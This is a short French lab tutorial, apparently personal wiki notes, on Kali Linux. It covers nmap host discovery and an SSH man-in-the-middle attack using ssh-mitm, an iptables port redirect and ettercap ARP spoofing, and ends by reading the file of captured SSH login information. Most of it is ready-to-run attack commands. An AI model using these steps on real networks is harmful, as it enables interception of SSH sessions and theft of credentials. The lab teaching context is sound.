Utilisation de Utilisation de Kali

De Travail-ivan

Utilisation de Kali

Découverte des hôtes et services présents sur un réseau local

En tant qu’attaquant, la première étape consiste à recueillir des informations sur le réseau dans lequel nous nous trouvons. Ainsi, à l’aide de l’outil nmap présent sur Kali Linux :

Réaliser un scan du réseau

sudo nmap -sP 192.168.56.0/24

Scanner un hôtes

Afin de savoir quels ports sont ouverts sur ceux-ci et quels services sont proposés

sudo nmap -sV 192.168.56.10

Attaque MITM d’un service SSH

Se déplacer dans le répertoire ssh-mitm

cd ssh-mitm

lancer le service ssh-mitm

sudo ./start.sh

activer le routage

sudo sysctl -w net.ipv4.ip_forward=1

Configurer redirection de ports afin de rediriger tous les flux à destination de la machine attaquante sur le port 22/TCP vers le port 2222 du système Kali Linux

sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222

Lancer attaque avec la commande ettercap

sudo ettercap -i eth0 -T -M arp /192.168.56.10// /192.168.56.11//

• -T : lance ettercap en mode texte ; • -M : indique que l'on veut une attaque de type "Man in the middle" ; • 192.168.56.10 (serveur ssh) et 192.168.56.11 (client SSH) sont les adresses IP des victimes

Sur le poste de l’attaquant (Kali), il faut d’arrêter l’attaque ARP Spoofing, taper la touche Q pour arrêter.

arrêter le service ssh-mitm :

sudo ./stop.sh

aller chercher les information de connexion avec la commande suivante

sudo nano /home/ssh-mitm/shell_session_0.txt